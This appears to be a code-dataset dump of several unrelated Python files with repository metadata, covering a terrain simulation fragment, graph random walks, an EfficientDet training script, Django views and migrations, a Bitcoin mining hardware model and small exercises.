F_rhs_x = np.zeros(seg_length.size, dtype=float) # for each node
F_rhs_z = np.zeros(seg_length.size, dtype=float) # for each node
for (F, b) in zip((F_rhs_x, F_rhs_z), (bdot_x, bdot_z)):
F[0] = b[0] + b[-1] # invoking looped BCs
for i in xrange(1, F.size):
F[i] = b[i-1] + b[i] # why is this looking back not forward?
u_i = np.linalg.solve(A_ij2, F_rhs_x)
w_i = np.linalg.solve(A_ij2, F_rhs_z)
# disable these lines to test the resampling procedure...
node_x_exp[:-1] += u_i
node_z_exp[:-1] += w_i
# ...Cathles then regrids.
fn = interp.interp1d(node_x_exp, node_z_exp)
# node_x = init_node_x.copy()
# node_z = fn(node_x)
if mobile_pts is True:
# replace the above with mechanism to try to prevent bunching at tips:
# hard part is the new spacing of node_x
# get the total length:
seg_dx_temp = node_x_exp[(num_pts+1):(2*num_pts+1)]-node_x_exp[
num_pts:(2*num_pts)]
seg_dz_temp = node_z_exp[(num_pts+1):(2*num_pts+1)]-node_z_exp[
num_pts:(2*num_pts)]
# force the first and last pts to be effectively immobile:
# seg_dx_temp[0] = node_x_exp[num_pts+1] # node_x[0] = 0 always
seg_dx_temp[0] = node_x_exp[num_pts+1] - node_x_exp[num_pts]
# seg_dx_temp[-1] = array_length-node_x_exp[2*num_pts-1]
seg_dx_temp[-1] = node_x_exp[2*num_pts]-node_x_exp[2*num_pts-1]
# seg_dz_temp[0] = node_z_exp[num_pts+1] - fn(0.)
seg_dz_temp[0] = node_z_exp[num_pts+1] - node_z_exp[num_pts]
# seg_dz_temp[-1] = fn(array_length)-node_z_exp[2*num_pts-1]
seg_dz_temp[-1] = node_z_exp[2*num_pts]-node_z_exp[2*num_pts-1]
seg_length_temp = np.sqrt(np.square(seg_dx_temp) +
np.square(seg_dz_temp))
new_contour_cumlen[1:] = np.cumsum(seg_length_temp)
new_dl = new_contour_cumlen[-1]/num_pts
new_lengths = np.arange(0, new_dl*(num_pts+1), new_dl)
# rounding errors can appear here, so
if new_lengths.size > num_pts+1:
new_lengths = new_lengths[:-1]
assert new_lengths.size == num_pts+1
new_pos_byl = np.searchsorted(new_contour_cumlen, new_lengths[:-1])
# note that new elements get inserted BEFORE equal values => prob w 0
# so...
atstart = np.equal(new_contour_cumlen[new_pos_byl],
new_lengths[new_pos_byl])
atstart[-1] = False # don't move the last one!
new_pos_byl[atstart] += 1 # increment these into the next interval
prop_along_lines = (new_lengths[:-1] -
new_contour_cumlen[new_pos_byl-1])/(
new_contour_cumlen[new_pos_byl] -
new_contour_cumlen[new_pos_byl-1])
# now we can create the new node_x and node_z:
node_x[:] = node_x_exp[num_pts+new_pos_byl-1] + prop_along_lines*(
node_x_exp[num_pts+new_pos_byl] -
node_x_exp[num_pts+new_pos_byl-1])
# add some randomness
# DOING THIS ADDS SIGNIFICANT DIFFUSION!!!
offset = (np.random.rand(1.)-0.5)*array_length/num_pts
node_x += offset
# node_z = fn(node_x)
# The problem with the diffusion is getting in because the resampled
# pts are ALWAYS lower than the existing pts. The way to solve this is
# to try a quadratic resampling?
for i in xrange(node_x.size):
fnparam = np.polyfit(node_x_exp[(num_pts+new_pos_byl[i]-2):
(num_pts+new_pos_byl[i]+2)],
node_z_exp[(num_pts+new_pos_byl[i]-2):
(num_pts+new_pos_byl[i]+2)],
2)
# incorporates 1 seg on either side of the seg of interest (4 pts)
fnquad = np.poly1d(fnparam)
node_z[i] = fnquad(node_x[i])
else:
node_x[:] = node_x_exp[num_pts:(2*num_pts)]
node_z[:] = node_z_exp[num_pts:(2*num_pts)]
node_x_exp[num_pts:(2*num_pts)] = node_x
node_x_exp[:num_pts] = node_x - array_length
node_x_exp[(2*num_pts):] = node_x + array_length
node_z_exp[num_pts:(2*num_pts)] = node_z
node_z_exp[:num_pts] = node_z
node_z_exp[(2*num_pts):] = node_z
# # plot the new output
# if t % (num_tsteps//20) == 0:
# figure(1)
# plot(node_x, node_z)
# # check we're still running...
# if t % 100 == 0:
# print 'time ', t
deepest_elev[t] = node_z.min()
figure(1)
plot(init_node_x, init_node_z, 'k')
figure(2)
plot(node_x, node_z)
figure(3)
plot(init_node_x-init_node_x[np.argmin(init_node_z)], init_node_z-init_node_z.min(), 'k')
plot(node_x-node_x[np.argmin(node_z)], node_z-node_z.min(), 'r')
figure(4)
plot((np.arange(num_tsteps, dtype=float)+1.)*tstep, deepest_elev)
figure(5)
plot(node_x_exp, node_z_exp)
figure(6)
plot(node_x_exp[:-1], np.sum(connectivity_matrix, axis=0))
figure(7)
plot(node_x_exp[:-1], surf_T)
show()
|
[
"[email protected]"
] | |
9744dae7239f9c1835418cabf0cd0fdebe277c41
|
48c40649b84984eb4473f796ad1ec5a3294c1683
|
/LP/benchmark/methods/GATNE/walk.py
|
85ee1125073424eda2c4c02813dcfec381a7b00d
|
[
"MIT"
] |
permissive
|
danielTLevy/HGB
|
8260f23dd1cabc41df255dd8d5533e7aaca07339
|
3aca9c4099ba7ea0bcb68ef00ef19bab8dda638a
|
refs/heads/master
| 2023-08-06T10:03:39.786587 | 2021-09-29T08:12:18 | 2021-09-29T08:12:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,135 |
py
|
import random
import multiprocessing
from tqdm import tqdm
def walk(args):
walk_length, start, schema = args
# Simulate a random walk starting from start node.
rand = random.Random()
if schema:
schema_items = schema.split('-')
assert schema_items[0] == schema_items[-1]
walk = [start]
while len(walk) < walk_length:
cur = walk[-1]
candidates = []
for node in G[cur]:
if schema == '' or node_type[node] == schema_items[len(walk) % (len(schema_items) - 1)]:
candidates.append(node)
if candidates:
walk.append(rand.choice(candidates))
else:
break
return [str(node) for node in walk]
def initializer(init_G, init_node_type):
global G
G = init_G
global node_type
node_type = init_node_type
class RWGraph():
def __init__(self, nx_G, node_type_arr=None, num_workers=16):
self.G = nx_G
self.node_type = node_type_arr
self.num_workers = num_workers
def node_list(self, nodes, num_walks):
for loop in range(num_walks):
for node in nodes:
yield node
def simulate_walks(self, num_walks, walk_length, schema=None):
all_walks = []
nodes = list(self.G.keys())
random.shuffle(nodes)
if schema is None or schema=='':
with multiprocessing.Pool(self.num_workers, initializer=initializer, initargs=(self.G, self.node_type)) as pool:
all_walks = list(pool.imap(walk, ((walk_length, node, '') for node in tqdm(self.node_list(nodes, num_walks))), chunksize=256))
else:
schema_list = schema.split(',')
for schema_iter in schema_list:
with multiprocessing.Pool(self.num_workers, initializer=initializer, initargs=(self.G, self.node_type)) as pool:
walks = list(pool.imap(walk, ((walk_length, node, schema_iter) for node in tqdm(self.node_list(nodes, num_walks)) if schema_iter.split('-')[0] == self.node_type[node]), chunksize=512))
all_walks.extend(walks)
return all_walks
|
[
"[email protected]"
] | |
a2d3275ab3d2e66630d134701f09749e04fb0c2a
|
da87dbd0e4558f5e176846eea7fb6d4d64daa292
|
/myenv/bin/django-admin.py
|
6a82dadd00ee09598ba4593bd6fc7e3fd4b940c3
|
[] |
no_license
|
Aravinthvvs/DjangoProjects
|
5b617af0b3e6197bb4173131dc879e013b1f4db7
|
3f5ea5e1abcf8d2c5fb5c03125bfc68c52094010
|
refs/heads/master
| 2020-04-20T14:51:51.845476 | 2019-02-03T12:32:09 | 2019-02-03T12:32:09 | 168,911,841 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 154 |
py
|
#!/Users/aravinthvvs/myDjango/myenv/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"[email protected]"
] | |
b4335a5f81c3eca54da490e902cb886118f575f6
|
d7bcd4020efd8303ec42e9174b4822cd77b7df90
|
/hardware.py
|
872ba5fa8324e86febdd4975ef9942c32bb6f720
|
[] |
no_license
|
daggerhashimoto/btcpow
|
d147d4617815e9e344be5d51068a073966ece503
|
fa706cd72be35020a0ed6d52e46d321e35719746
|
refs/heads/master
| 2021-05-26T15:27:02.829112 | 2014-02-20T04:32:19 | 2014-02-20T04:32:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,080 |
py
|
#!/usr/bin/env python
from datetime import date
# Simple class to represent a piece of hardware
class hw:
def __init__(self, name, d, hashes, price, power):
self.name = name
self.date = d
self.hashes = hashes
self.price = price
self.power = power
self.hash_efficiency = hashes / price
self.power_efficiency = hashes / power
self.total_units = 0
self.embodied_energy = 0
self.on = True
def new_cap(self, capacity, embodied_energy_per_rig):
new_units = capacity / self.hashes
self.total_units += new_units
self.embodied_energy += embodied_energy_per_rig * new_units
def running(self, start, end, network_hashrate, usd_prices, electricity_price):
# Assume that a rig is turned off it fails to cover its power costs for
# an entire generation of hardware. This assumes miners are slightly
# bullish about the future price of BTC, which fits their psychology
# and is rational given BTC's deflationary monetary policy algorithm
proportion = self.hashes / network_hashrate
for (d,btc_price) in usd_prices:
if d >= start and d <= end:
payoff = 144. * 25 * btc_price
unit_payoff = proportion * btc_price
on = (unit_payoff / self.power) > electricity_price
#print self.name, "pays", unit_payoff * 3600 * 24, "/day and is", on ,
#print (unit_payoff / self.power), "dollars per joule"
if on:
# The rig paid or its electicity this period, so it will
# keep running until new hardware is out
if not self.on:
print self.name, "HAS TURNED BACK ON"
self.on = True
return True
if self.on:
print self.name, "now off (%f%% of network)" % (proportion * self.total_units * 100), "unit payoff", unit_payoff *3600* 24, "/day"
self.on = False
return False
|
[
"[email protected]"
] | |
79da1f5960636d02fb36de8a0246c12483334113
|
67efa3f44b809984bc4433481f13b4b84f48fa30
|
/task1/task1.py
|
be34b7ed899f3ac6bc5b0e3e45a2bf30d41f9af6
|
[] |
no_license
|
Boltivets-Dmitro/python_practice
|
9aaff1c66ad0e86e00fb5c88288864dde3d1ff4b
|
3b18cb504e2f45ca206120da7d4d1c522292fc6f
|
refs/heads/main
| 2023-06-18T12:29:00.685450 | 2021-07-07T13:52:40 | 2021-07-07T13:52:40 | 383,112,148 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
import re
str = input("\nВведіть рядок: ")
words = ''.join([i for i in str if not i.isdigit()])
numbers = re.findall(r'\d+', str)
numbers = [int(i) for i in numbers]
print("\nРядок без чисел:", words)
print("Числа з рядка:", numbers)
WithLarge = ' '.join(words[0].upper() + words[1:-1] + words[-1:].upper() for words in words.split())
print("\nРядок після змін:", WithLarge)
numbers.remove(max(numbers))
numberIndex = [numbers[i]**i for i in range(0,len(numbers))]
print("Масив чисел в степені по їх індексу:", numberIndex)
print("\n")
|
[
"[email protected]"
] | |
f9f05ec8091310728dec15ae327849436e548ada
|
2a51ebbb11d2e86efeb6b4c406c9ef9e8dd161a1
|
/train.py
|
2cbc2934ea1f8e2507024a040d0bdd5582945439
|
[
"MIT"
] |
permissive
|
MaLiXiaoGuo/efficientdet-pytorch
|
37f6099d24532f2fcf255d9617841de5d9507248
|
6a013481f9264a065ff1e3c5affe3102ef6066ce
|
refs/heads/master
| 2023-04-04T16:57:56.542193 | 2021-04-07T10:57:42 | 2021-04-07T10:57:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,362 |
py
|
#-------------------------------------#
# 对数据集进行训练
#-------------------------------------#
import os
import time
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from tqdm import tqdm
from nets.efficientdet import EfficientDetBackbone
from nets.efficientdet_training import FocalLoss
from utils.dataloader import EfficientdetDataset, efficientdet_dataset_collate
def get_lr(optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
#---------------------------------------------------#
# 获得类
#---------------------------------------------------#
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def fit_one_epoch(net,focal_loss,epoch,epoch_size,epoch_size_val,gen,genval,Epoch,cuda):
total_r_loss = 0
total_c_loss = 0
total_loss = 0
val_loss = 0
net.train()
with tqdm(total=epoch_size,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_size:
break
images, targets = batch[0], batch[1]
with torch.no_grad():
if cuda:
images = Variable(torch.from_numpy(images).type(torch.FloatTensor)).cuda()
targets = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)).cuda() for ann in targets]
else:
images = Variable(torch.from_numpy(images).type(torch.FloatTensor))
targets = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)) for ann in targets]
optimizer.zero_grad()
_, regression, classification, anchors = net(images)
loss, c_loss, r_loss = focal_loss(classification, regression, anchors, targets, cuda=cuda)
loss.backward()
optimizer.step()
total_loss += loss.item()
total_r_loss += r_loss.item()
total_c_loss += c_loss.item()
pbar.set_postfix(**{'Conf Loss' : total_c_loss / (iteration+1),
'Regression Loss' : total_r_loss / (iteration+1),
'lr' : get_lr(optimizer)})
pbar.update(1)
net.eval()
print('Start Validation')
with tqdm(total=epoch_size_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(genval):
if iteration >= epoch_size_val:
break
images_val, targets_val = batch[0], batch[1]
with torch.no_grad():
if cuda:
images_val = Variable(torch.from_numpy(images_val).type(torch.FloatTensor)).cuda()
targets_val = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)).cuda() for ann in targets_val]
else:
images_val = Variable(torch.from_numpy(images_val).type(torch.FloatTensor))
targets_val = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)) for ann in targets_val]
optimizer.zero_grad()
_, regression, classification, anchors = net(images_val)
loss, c_loss, r_loss = focal_loss(classification, regression, anchors, targets_val, cuda=cuda)
val_loss += loss.item()
pbar.set_postfix(**{'total_loss': val_loss / (iteration + 1)})
pbar.update(1)
print('Finish Validation')
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.4f || Val Loss: %.4f ' % (total_loss/(epoch_size+1),val_loss/(epoch_size_val+1)))
print('Saving state, iter:', str(epoch+1))
torch.save(model.state_dict(), 'logs/Epoch%d-Total_Loss%.4f-Val_Loss%.4f.pth'%((epoch+1),total_loss/(epoch_size+1),val_loss/(epoch_size_val+1)))
return val_loss/(epoch_size_val+1)
#----------------------------------------------------#
# 检测精度mAP和pr曲线计算参考视频
# https://www.bilibili.com/video/BV1zE411u7Vw
#----------------------------------------------------#
if __name__ == "__main__":
#-------------------------------------------#
# 训练前,请指定好phi和model_path
# 二者所使用Efficientdet版本要相同
#-------------------------------------------#
phi = 0
#-------------------------------------------#
# 根据phi的值选择输入图片的大小
#-------------------------------------------#
input_sizes = [512, 640, 768, 896, 1024, 1280, 1408, 1536]
input_shape = (input_sizes[phi], input_sizes[phi])
#-------------------------------#
# 是否使用Cuda
# 没有GPU可以设置成False
#-------------------------------#
Cuda = True
#----------------------------------------------------#
# classes的路径非常重要
# 训练前一定要修改classes_path,使其对应自己的数据集
#----------------------------------------------------#
classes_path = 'model_data/voc_classes.txt'
#----------------------------------------------------#
# 获取classes
#----------------------------------------------------#
class_names = get_classes(classes_path)
num_classes = len(class_names)
#------------------------------------------------------#
# 创建EfficientDet模型
# 训练前一定要修改classes_path和对应的txt文件
#------------------------------------------------------#
model = EfficientDetBackbone(num_classes,phi)
#------------------------------------------------------#
# 权值文件请看README,百度网盘下载
#------------------------------------------------------#
model_path = "model_data/efficientdet-d0.pth"
print('Loading weights into state dict...')
model_dict = model.state_dict()
pretrained_dict = torch.load(model_path)
pretrained_dict = {k: v for k, v in pretrained_dict.items() if np.shape(model_dict[k]) == np.shape(v)}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
print('Finished!')
net = model.train()
if Cuda:
net = torch.nn.DataParallel(model)
cudnn.benchmark = True
net = net.cuda()
efficient_loss = FocalLoss()
#----------------------------------------------------#
# 获得图片路径和标签
#----------------------------------------------------#
annotation_path = '2007_train.txt'
#----------------------------------------------------------------------#
# 验证集的划分在train.py代码里面进行
# 2007_test.txt和2007_val.txt里面没有内容是正常的。训练不会使用到。
# 当前划分方式下,验证集和训练集的比例为1:9
#----------------------------------------------------------------------#
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
#------------------------------------------------------#
# 主干特征提取网络特征通用,冻结训练可以加快训练速度
# 也可以在训练初期防止权值被破坏。
# Init_Epoch为起始世代
# Freeze_Epoch为冻结训练的世代
# Epoch总训练世代
# 提示OOM或者显存不足请调小Batch_size
#------------------------------------------------------#
if True:
#--------------------------------------------#
# BATCH_SIZE不要太小,不然训练效果很差
#--------------------------------------------#
lr = 1e-3
Batch_size = 8
Init_Epoch = 0
Freeze_Epoch = 50
optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)
lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.5, patience=2, verbose=True)
train_dataset = EfficientdetDataset(lines[:num_train], (input_shape[0], input_shape[1]), is_train=True)
val_dataset = EfficientdetDataset(lines[num_train:], (input_shape[0], input_shape[1]), is_train=False)
gen = DataLoader(train_dataset, shuffle=True, batch_size=Batch_size, num_workers=4, pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
gen_val = DataLoader(val_dataset, shuffle=True, batch_size=Batch_size, num_workers=4,pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
epoch_size = num_train//Batch_size
epoch_size_val = num_val//Batch_size
#------------------------------------#
# 冻结一定部分训练
#------------------------------------#
for param in model.backbone_net.parameters():
param.requires_grad = False
for epoch in range(Init_Epoch,Freeze_Epoch):
val_loss = fit_one_epoch(net,efficient_loss,epoch,epoch_size,epoch_size_val,gen,gen_val,Freeze_Epoch,Cuda)
lr_scheduler.step(val_loss)
if True:
#--------------------------------------------#
# BATCH_SIZE不要太小,不然训练效果很差
#--------------------------------------------#
lr = 1e-4
Batch_size = 4
Freeze_Epoch = 50
Unfreeze_Epoch = 100
optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)
lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.5, patience=2, verbose=True)
train_dataset = EfficientdetDataset(lines[:num_train], (input_shape[0], input_shape[1]), is_train=True)
val_dataset = EfficientdetDataset(lines[num_train:], (input_shape[0], input_shape[1]), is_train=False)
gen = DataLoader(train_dataset, shuffle=True, batch_size=Batch_size, num_workers=4, pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
gen_val = DataLoader(val_dataset, shuffle=True, batch_size=Batch_size, num_workers=4,pin_memory=True,
drop_last=True, collate_fn=efficientdet_dataset_collate)
epoch_size = num_train//Batch_size
epoch_size_val = num_val//Batch_size
#------------------------------------#
# 解冻后训练
#------------------------------------#
for param in model.backbone_net.parameters():
param.requires_grad = True
for epoch in range(Freeze_Epoch,Unfreeze_Epoch):
val_loss = fit_one_epoch(net,efficient_loss,epoch,epoch_size,epoch_size_val,gen,gen_val,Unfreeze_Epoch,Cuda)
lr_scheduler.step(val_loss)
|
[
"[email protected]"
] | |
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py
|
25da9175da664053709c8d25e93ab4bca77cade7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 515 |
py
|
def flip(s,l):
str1 = []
for i in range(l):
if(s[i] == '-'):
str1.append('+')
else:
str1.append('-')
return "".join(str1)
test_cases = int(raw_input())
for test in range(test_cases):
s = raw_input()
l = len(s)
count = l
let =0
while ('-' in s):
let+=1
last_m = s[:count].rfind("-")
s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
count = s.rfind("+")
print "case #"+str(test+1)+": "+str(let)
|
[
"[[email protected]]"
] | |
15c1f69c5aa5ca2b67a72818e30d8b469b8e8493
|
a5c3174d2b3a168274b61c0a6b5df498f888bf70
|
/cars/urls.py
|
04c2bfebb6bd822e57fe1e02adb73f3b5eb06328
|
[] |
no_license
|
nord778/Rcoi_course
|
83dd69d2e96b71a4285fbdeed624a34f92b00eb2
|
b0b513467bf33e40b2909f8b02fa1d2e64393d4b
|
refs/heads/master
| 2023-06-14T05:52:35.224671 | 2021-06-29T08:48:41 | 2021-06-29T08:48:41 | 380,979,906 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.cars, name='cars'),
path('<int:id>', views.car_detail, name='car_detail'),
path('search', views.search, name='search'),
]
|
[
"[email protected]"
] | |
9c74c5965bad6ba10f49b56d5ec78a2342cfe9e0
|
377fc6e13101a2a45826cd118110c790f396a805
|
/past202010-b.py
|
458abc0ee58e452eeec63c3c668e014a6a90092e
|
[] |
no_license
|
number09/atcoder
|
4076e7223f424b9923754e73992d6442e0bb0de7
|
f521ca1205b254d99744abaf6a7a5bfe69845fe0
|
refs/heads/master
| 2021-06-04T23:16:39.021645 | 2021-01-19T08:30:39 | 2021-01-19T08:30:39 | 132,128,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
x, y = map(int, input().split())
if y == 0:
print('ERROR')
else:
a = str(x / y)
a_a, a_b = a.split('.')
if len(a_b) == 1:
a_b += '0'
print(a_a + '.' + a_b[:2])
|
[
"[email protected]"
] | |
4a37455d9a0b65a8c4aec6586528fc1fcda1e472
|
085d3f2f8de5442d69962a65b8acd79478599022
|
/2.Dictionaries - the root of Python/Safely finding by key.py
|
e66f37889bfe6d285916f26ea00f6830005db3ba
|
[] |
no_license
|
Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp
|
bfe8f8c4d4bc3998ef612f0d3137b15e662209d0
|
c2eb30d3c500f69486921d26071a2ef2244e0402
|
refs/heads/main
| 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
# Safely print rank 7 from the names dictionary
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
|
[
"[email protected]"
] | |
b56333e0e90f01dcc81cbfd40678a72aa6983028
|
0df72d9c1f3c30f30a329ef0b87edaa8d0a1c5d7
|
/Day-4/Task6.py
|
9c822d47037eabf7233b03bfc134f44f9d2271d6
|
[] |
no_license
|
pranshu-joshi/Pranshu_InternshipTasks
|
828f7af51e672accec95d36b6faec58286765da1
|
d249e160568d227e220c13e3409c707cff54132c
|
refs/heads/main
| 2023-05-22T19:10:02.448125 | 2021-06-14T10:56:15 | 2021-06-14T10:56:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 156 |
py
|
# Variable-length keyword arguments demo.
def myfunction(**kwargs):
    """Print each keyword-argument name alongside its value."""
    for name, value in kwargs.items():
        print(name, value)

myfunction(firstname=': Pranshu', lastname=': Joshi')
|
[
"[email protected]"
] | |
bb41fbb260b41833d1b96a8fd626cf8493a3bcbd
|
8f3df95b1f729ab690cb99fcda80d5dc298ee75d
|
/mystorage/migrations/0001_initial.py
|
0156f8c0d91c3ce03143277f914af629fefbd191
|
[] |
no_license
|
solone313/DRF_practice
|
8c72ef46cc93f607cce6b3f98a80d1bf7ca56c14
|
a1473f341f81ac067cbd8c8160b6bd48d4bdf6ad
|
refs/heads/master
| 2020-12-04T19:09:47.410682 | 2020-01-07T13:13:24 | 2020-01-07T13:13:24 | 231,877,266 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 796 |
py
|
# Generated by Django 2.2.8 on 2020-01-05 06:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema migration: creates the ``Essay`` table."""

    # First migration for this app.
    initial = True

    dependencies = [
        # Essay.author references the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Essay',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=30)),
                ('body', models.TextField()),
                # default=1 assigns user pk 1 to pre-existing rows; rows are
                # removed when their author is deleted (CASCADE).
                ('author', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
a89da0c65a3a5001c7d30b8a9f9869e3deb76f6e
|
e69ec735c091215141acab0a6f2e07e2606cd1b2
|
/src/kirr/hostsconf/views.py
|
a933e13a04210c16a7454b73d5a00c587391a512
|
[
"MIT"
] |
permissive
|
imtiaz-rahi/django-short-url
|
209f4e7cd0ee490842a331f305f71577be2cf6f6
|
9fc3dc873d3307eb20bdc77a91037f269f8e8a00
|
refs/heads/master
| 2022-11-04T16:18:35.812899 | 2020-06-16T12:07:18 | 2020-06-16T12:14:18 | 266,201,831 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 340 |
py
|
from django.conf import settings
from django.http import HttpResponseRedirect
DEFAULT_REDIRECT_URL = getattr(settings, 'DEFAULT_REDIRECT_URL', 'http://www.kirr.co')
def wildcard_redirect(request, path=None, *args, **kwargs):
    """Redirect every request to DEFAULT_REDIRECT_URL, appending *path* when one was captured."""
    if path is None:
        destination = DEFAULT_REDIRECT_URL
    else:
        destination = f'{DEFAULT_REDIRECT_URL}/{path}'
    return HttpResponseRedirect(destination)
|
[
"[email protected]"
] | |
dbb7d69232e842355628dd33e1a621132ca26521
|
0a8bb114534eabdcf8d9a1d43462e374183cf6e7
|
/users/urls.py
|
0ad2d087b883a2f82bcc164833f2af8d9b5f9882
|
[] |
no_license
|
jodhiambo/beelinev1
|
70a465ddf6e1f89493af07122496fd503d4d5d86
|
d8af31cf1090c58fe52d6bec0f82ac49e69260df
|
refs/heads/main
| 2023-06-23T09:05:47.386524 | 2021-07-21T12:51:00 | 2021-07-21T12:51:00 | 388,112,973 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 498 |
py
|
from django.urls import path
from django.contrib.auth import views as auth_views
from . import views
# from userprofiles.views import get_users_list, get_user_details
# URL namespace: reverse with e.g. reverse('users:account_login').
app_name = 'users'

urlpatterns = [
    # NOTE(review): the names 'account_signup'/'account_login' match
    # django-allauth's conventions — presumably these custom views override
    # allauth's defaults; confirm against the project's root urlconf.
    path('accounts/signup/', views.MySignUpView.as_view(), name='account_signup'),
    path('accounts/login/', views.MyLoginView.as_view(), name='account_login'),
    # path('users/list/', get_users_list, name='userlist'),
    # path('users/<int:id>/', get_user_details, name='the-user'),
]
|
[
"[email protected]"
] | |
f039f11f1012417d425afe36144602e290845663
|
dc182e5b4597bdd104d6695c03744a12ebfe2533
|
/PythonScripts/cache_decorator.py
|
13a86e3faccaa6620f606d3880ecb8559d34a2e1
|
[] |
no_license
|
srinaveendesu/Programs
|
06fb4a4b452445e4260f9691fe632c732078d54d
|
f6dbd8db444678b7ae7658126b59b381b3ab0bab
|
refs/heads/master
| 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 |
Python
|
UTF-8
|
Python
| false | false | 404 |
py
|
def cache(func):
    """Decorator that memoizes *func* by its call arguments.

    The cache key combines the positional args with the keyword items
    sorted by name, so ``f(a=1, b=2)`` and ``f(b=2, a=1)`` hit the same
    entry.  All arguments must be hashable.  The cache is unbounded;
    prefer ``functools.lru_cache`` when eviction is needed.
    """
    # BUG FIX: the module never imported functools, so decorating any
    # function raised NameError; import it here.
    import functools

    @functools.wraps(func)
    def wrapper_cache(*args, **kwargs):
        # Sorting keyword items makes the key insensitive to call order.
        cache_key = args + tuple(sorted(kwargs.items()))
        if cache_key not in wrapper_cache.cache:
            wrapper_cache.cache[cache_key] = func(*args, **kwargs)
        return wrapper_cache.cache[cache_key]

    wrapper_cache.cache = {}
    return wrapper_cache
|
[
"[email protected]"
] | |
368da12078ad24bb8c1403761b573a5acd4f731c
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/1-Python-Basics/4-bind()-complex_20200412164915.py
|
3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
# Demonstrate the complex() constructor's argument forms.
for value in (complex(2, -3), complex(1), complex(), complex('5-9j')):
    print(value)
# output
# (2-3j)
# (1+0j)
# 0j
# (5-9j)

# bin() renders an integer as a binary string with Python's '0b' prefix.
print(bin(5))
# binary output 0b101; outside Python the number 5 is written as 101

# Converting from binary back into an integer was left unfinished here:
print()
|
[
"[email protected]"
] | |
81e61ec856c688e116a50309c0fdcc84a1272194
|
26e50ea44cdaee9dbf07dd641ceef1fdae661bb4
|
/snake/snake.py
|
ab08e4d00c289abcb7f7cffadb08bf23155341bd
|
[] |
no_license
|
javibodas/SnakePython
|
